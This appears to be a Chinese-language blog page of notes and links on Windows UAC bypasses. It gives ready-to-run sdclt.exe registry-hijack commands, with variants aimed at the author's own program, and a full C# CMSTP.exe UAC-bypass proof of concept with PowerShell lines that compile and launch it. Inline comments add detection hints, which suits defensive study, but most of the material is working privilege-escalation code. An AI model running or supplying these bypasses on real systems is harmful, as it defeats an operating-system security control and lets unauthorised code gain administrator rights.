2020年6月29日 星期一

使用Windows命令行reg控制注册表键值

https://www.qingsword.com/qing/163.html#windows-reg-1

https://www.qingsword.com/qing/163.html

使用 sdclt 绕过 UAC 的新方法

https://nosec.org/home/detail/2205.html

rem Step 1: two writes under the current user's hive (HKCU), which need no elevation.
rem   - first "reg add" has no /v, so it sets the key's default value to the command string;
rem   - second "reg add" creates an empty value named DelegateExecute on the same key;
rem   - /f overwrites whatever is already there without prompting.
rem Defender note: a write to HKCU\Software\Classes\Folder\shell\open\command is rare in
rem normal use and is a good registry-audit / Sysmon registry-event detection point.
rem NOTE(review): while this key exists, opening folders for this user is presumably
rem redirected to the command as well - confirm on a test machine, never on a production host.
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

rem Step 2: start the Backup and Restore binary that the linked articles describe as the trigger.
rem Defender note: sdclt.exe with an unexpected child process (cmd.exe here) is the
rem process-creation signal to alert on; the linked write-ups cover the affected builds.
%windir%\system32\sdclt.exe

rem Step 3: remove the per-user override again. If this step is skipped the key stays behind.
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f


regedit.exe

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c regedit.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

explorer

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c explorer.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c prjSt.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c D:\2019千機專案原始碼\檔案監控_20200504\原始碼\pt_練習範例\本機電腦名稱及呼呼程式\prjSt\prjSt\bin\Debug\prjSt.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

taskkill /f /im cmd.exe

2020年6月24日 星期三

使用 sdclt 绕过 UAC 的新方法

繞過UAC系列之 SDCLT的利用


機碼登錄與三種格式(REG、INF、BAT)介紹



https://nosec.org/home/detail/2205.html

https://kknews.cc/zh-tw/code/k693ozq.html

https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/

=============================================================
/*
UAC Bypass using CMSTP.exe microsoft binary

Based on previous work from Oddvar Moe
Research on CMSTP.exe

And this PowerShell script of Tyler Applebaum
https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1

Code author: Andre Marques (@_zc00l)
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Windows;
using System.Runtime.InteropServices;


  // Proof-of-concept that writes an .inf profile and passes it to cmstp.exe so that the
  // command embedded in the profile is run by cmstp.exe instead of by the caller.
  // Technique references: MITRE ATT&CK T1218.003 (CMSTP) and T1548.002 (Bypass UAC).
  //
  // Observable artefacts produced by the visible code (useful for detection engineering):
  //   - a randomly named *.inf file created in C:\windows\temp and never deleted here;
  //   - a cmstp.exe process whose command line is "/au <that .inf path>";
  //   - "taskkill /IM cmstp.exe /F" run from the profile's pre-setup section;
  //   - a synthetic ENTER keystroke sent to the foreground cmstp window.
  // NOTE(review): whether the command ends up elevated depends on the account being a local
  // administrator and on the UAC level; that is not visible in this file - see the linked
  // research. Standard-user accounts and application-control rules that block cmstp.exe
  // where Connection Manager profiles are not used are the usual mitigations.
  public  class CMSTPBypass
    {
        // INF template. REPLACE_COMMAND_LINE is a placeholder inside
        // [RunPreSetupCommandsSection]; SetInfFile substitutes the caller's command for it.
        // The line after the placeholder force-kills cmstp.exe once the command was issued.
        // The field is public, static and not readonly, so any code in the process can
        // replace the template.
        public static string InfData = @"[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
""HKLM"", ""SOFTWAREMicrosoftWindowsCurrentVersionApp PathsCMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"

[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""

";

        // user32.dll imports used only by SetWindowActive to bring the cmstp window forward.
        [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
        [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);

        // Hard-coded location of the binary that is started by Execute.
        public static string BinaryPath = @"c:\windows\system32\cmstp.exe";

        /* Writes a copy of InfData, with REPLACE_COMMAND_LINE replaced by CommandToExecute,
           to C:\windows\temp\<random>.inf and returns the full path of that file.
           CommandToExecute is inserted verbatim: nothing here validates or escapes it, so
           it can add further lines to the profile. The file is not removed by this class,
           which leaves a forensic artefact on disk. */
        public static string SetInfFile(string CommandToExecute)
        {
            // GetRandomFileName returns "name.ext"; only the part before the first dot is kept.
            string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
            string TemporaryDir = @"C:\windows\temp";
            StringBuilder OutputFile = new StringBuilder();
            OutputFile.Append(TemporaryDir);
            OutputFile.Append("\\");
   
            OutputFile.Append(RandomFileName);
            OutputFile.Append(".inf");
            StringBuilder newInfData = new StringBuilder(InfData);
            newInfData.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
            // Exceptions from the write (for example access denied) are not caught here.
            File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
            return OutputFile.ToString();
        }

        /* Writes the profile for CommandToExecute, starts cmstp.exe with "/au <profile>",
           waits for a cmstp window and sends ENTER to it.
           Returns false only when BinaryPath does not exist; otherwise returns true without
           checking whether the command was actually run. */
        public static bool Execute(string CommandToExecute)
        {
            if (!File.Exists(BinaryPath))
            {
                Console.WriteLine("Could not find cmstp.exe binary!");
                return false;
            }
            StringBuilder InfFile = new StringBuilder();
            InfFile.Append(SetInfFile(CommandToExecute));

            Console.WriteLine("Payload file written to " + InfFile.ToString());
            ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
            // The profile path is appended unquoted; it contains no spaces because it is
            // always built from C:\windows\temp and a random name.
            startInfo.Arguments = "/au " + InfFile.ToString();
            startInfo.UseShellExecute = false;
            // The returned Process object is neither kept nor disposed.
            Process.Start(startInfo);

            IntPtr windowHandle = new IntPtr();
            windowHandle = IntPtr.Zero;
            // Polls with no delay and no timeout: if no cmstp window ever appears this
            // loop spins forever at full CPU.
            do
            {
                windowHandle = SetWindowActive("cmstp");
            } while (windowHandle == IntPtr.Zero);

            // SendKeys targets whichever window has focus at this moment, so the keystroke
            // can land elsewhere if focus changed after SetWindowActive returned.
            System.Windows.Forms.SendKeys.SendWait("{ENTER}");
            return true;
        }

        /* Looks up processes named ProcessName, takes the first one, and tries to bring its
           main window to the foreground. Returns that window handle, or IntPtr.Zero when no
           such process exists or it has no main window yet. */
        public static IntPtr SetWindowActive(string ProcessName)
        {
            Process[] target = Process.GetProcessesByName(ProcessName);
            if (target.Length == 0) return IntPtr.Zero;
            // Refresh discards cached process data before MainWindowHandle is read.
            target[0].Refresh();
            IntPtr WindowHandle = new IntPtr();
            WindowHandle = target[0].MainWindowHandle;
            if (WindowHandle == IntPtr.Zero) return IntPtr.Zero;
            // Return values of both Win32 calls are ignored; 5 is SW_SHOW.
            SetForegroundWindow(WindowHandle);
            ShowWindow(WindowHandle, 5);
            return WindowHandle;
        }
    }
===================================================================

# Compiles Source.cs (the C# class shown above) into CMSTPUACBypass.dll.
# System.Windows.Forms is referenced because the class calls SendKeys.SendWait.
# Defender note: Add-Type with -TypeDefinition is recorded by PowerShell script block
# logging (event ID 4104) and is not permitted in Constrained Language Mode, so both are
# useful controls against this kind of compile-and-run usage.
Add-Type -TypeDefinition ([IO.File]::ReadAllText("Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTPUACBypass.dll"

# Loads the compiled assembly from a byte array rather than by file path.
 [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("CMSTPUACBypass.dll"))

# Calls the static entry point with the command to place in the .inf profile.
# Expected telemetry: a new .inf in C:\windows\temp and a cmstp.exe process started with /au.
[CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")

在 UAC 啟動的情況下，如何讓程式每次執行時都以［系統管理員身分］執行

http://stenwang.blogspot.com/2015/11/uac-uac.html

https://www.kocpc.com.tw/archives/302302

https://blog.xuite.net/as15774/wretch/105856309-%5BC%23%5D+%E8%AE%93%E7%A8%8B%E5%BC%8F%E4%BB%A5%E7%B3%BB%E7%B5%B1%E7%AE%A1%E7%90%86%E5%93%A1%E8%BA%AB%E5%88%86%E5%9F%B7%E8%A1%8C%28UAC%29

https://lissam.pixnet.net/blog/post/21339021-%E5%9C%A8-uac-%E5%95%9F%E5%8B%95%E7%9A%84%E6%83%85%E6%B3%81%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E8%AE%93%E7%A8%8B%E5%BC%8F%E6%AF%8F%E6%AC%A1%E5%9F%B7%E8%A1%8C%E6%99%82

https://www.bilibili.com/video/BV1e4411v7oz?from=search&seid=4447783937126793261

WPF聊天室应用(ASP.NET Core SignalR)

  WPF聊天室应用(ASP.NET Core SignalR) https://www.bilibili.com/video/BV1Q741187Si?p=2 https://www.bilibili.com/video/BV1UV411e75T?from=search...